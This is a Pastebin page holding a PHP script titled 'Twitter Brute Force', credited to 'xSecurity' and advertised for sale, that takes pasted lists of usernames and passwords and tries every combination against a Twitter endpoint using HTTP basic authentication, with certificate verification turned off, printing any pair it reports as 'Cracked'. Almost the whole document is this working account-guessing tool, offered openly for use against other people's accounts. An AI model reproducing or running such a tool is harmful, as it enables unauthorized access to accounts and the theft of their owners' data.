Advertisement
Ribang

Twitter Brute Force

Feb 4th, 2018
813
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.90 KB | None | 0 0
  1. <?
  2. ob_start();
  3. @set_time_limit(0);
  4. /*
  5. * Coder By : xSecurity | Mr.Dm4R
  6. * Thanks 2 : Mr.Dm4r
  7. * This Tool For Sale = CashU
  8. * b0x@hotmail.com
  9. */
  10.  
  11. echo "
  12. <form method='POST'>
  13. <title># Twitter Brute Force #</title>
  14. </head>
  15. <style>
  16. textarea {
  17. resize:none;
  18. color: #3366FF;
  19. border:1px solid #3366FF;
  20. border-left: 4px solid #3366FF;
  21. }
  22. input {
  23. color: #3366FF;
  24. border:1px dotted #3366FF;
  25. }
  26. </style>";
  27.  
  28. echo "
  29. <body text='#FFFFFF' bgcolor='#000000'>
  30. <p align='center' dir='ltr'>&nbsp;<img border='0' src='http://fxcapernaum.younglife.org/AnalyticsReports/Twitter%20Logo.png' width='88' height='77'><b><font face='Tahoma' size='5'><font color='#2AAEDA'>Brure
  31. </font>Force' </font><font face='Tahoma' size='4'>By <font color='#1D82A3'>
  32. xSecurity</font></font><font face='Tahoma' size='5'> '</font></b></p>
  33. <p dir='ltr' align='center'>
  34. <textarea cols='22' class='area' rows='14' name='username'>Username</textarea>
  35. <textarea cols='22' class='area' rows='14' name='password'>Password</textarea><br><input type='submit' value='Start Brute'><br></p>";
  36. if($_POST['username'] and $_POST['password']){
  37. #function
  38. function brute($user,$pass)
  39. {
  40. $ch = curl_init();
  41. curl_setopt($ch, CURLOPT_URL, "https://userstream.twitter.com/");
  42. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 0);
  43. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  44. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
  45. curl_setopt($ch, CURLOPT_POSTFIELDS, "track=twitter");
  46. curl_setopt($ch, CURLOPT_USERPWD, $user.":".$pass);
  47. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  48. # cURL - Brute Users & Password
  49. $login = curl_exec($ch);
  50. $status=(int)curl_getinfo($ch,CURLINFO_HTTP_CODE);
  51. if($status=='404')
  52. {
  53. echo "<p align='center' dir='ltr'><font face='Tahoma' size='2'>[+] Cracked : Username : <font color='#FF0000'>$user</font>&nbsp; Password : <font color='#FF0000'>$pass</font></font></p>";
  54. }
  55. }
  56. # POSTS
  57. $username = explode("\n", $_POST['username']);
  58. $password = explode("\n", $_POST['password']);
  59.  
  60. # Foreach Users N' Textarea
  61. foreach($username as $users) {
  62. $users = @trim($users);
  63. foreach($password as $pass) {
  64. $pass = @trim($pass);
  65. brute($users,$pass); }}
  66. # cURL
  67. echo "<p align='center' dir='ltr'><font face='Tahoma' size='2'>+----------------------------------------------------------------------+</font></p>";
  68. }
  69. echo "<p align='center' dir='ltr'><font face='Tahoma' size='2'>Coded By : xSecurity | b0x@hotmail.com | Thanks 2 : Mr.Dm4R</font></p>";
  70. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement